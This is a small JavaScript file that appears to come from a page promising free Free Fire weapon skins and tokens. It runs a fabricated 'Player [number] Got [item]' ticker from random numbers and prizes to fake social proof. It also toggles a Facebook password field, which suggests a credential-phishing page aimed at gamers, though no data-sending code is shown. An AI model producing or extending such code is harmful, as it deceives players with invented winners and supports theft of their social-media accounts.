function generateRandomNumber() {

    return Math.floor(1000000000 + Math.random() * 9000000000);

}
const words = ['M1014 - SCORPIO SHATTER', 'THOMPSON - CINDERED COLOSSUS', 'XM8 - DESTINY GUARDIAN', 'GROZA - BANG! POPBLASTER', 'MP40 - PREDATORY COBRA', 'AK47 - BLUE FLAME DRACO', 'SCAR - MEGALODON ALPHA', 'M1887 - STERLING CONQUEROR', 'M1014 - GREEN FLAME DRACO', '2064x XM8 - Destiny Guardian Tokens', '2064x MP40 - Predatory Cobra Tokens', '2064x SCAR - Megalodon Alpha', '2064x AN94 - Evil Howler Tokens', '2064x UMP - Booyah Day 2021 Tokens', '2064x AK47 - Blue Flame Draco Tokens'];

function chooseRandomWord() {
    return words[Math.floor(Math.random() * words.length)];
}

function updatePlayerInfo() {
    const playerNumber = generateRandomNumber();
    const randomWord = chooseRandomWord();

    $('#playerdiv').html(`Player ${playerNumber} Got <b>${randomWord}</b>`);
}

updatePlayerInfo();
setInterval(updatePlayerInfo, 2000);

// show hide password for facebook
function showFbPassword() {
    var x = document.getElementById("password-facebook");
    if (x.type === "password") {
        x.type = "text";
        $('.showPassword').hide();
        $('.hidePassword').show();
    } else {
        x.type = "password";
    }
}
function hideFbPassword() {
    var x = document.getElementById("password-facebook");
    if (x.type === "text") {
        x.type = "password";
        $('.showPassword').show();
        $('.hidePassword').hide();
    } else {
        x.type = "text";
    }
}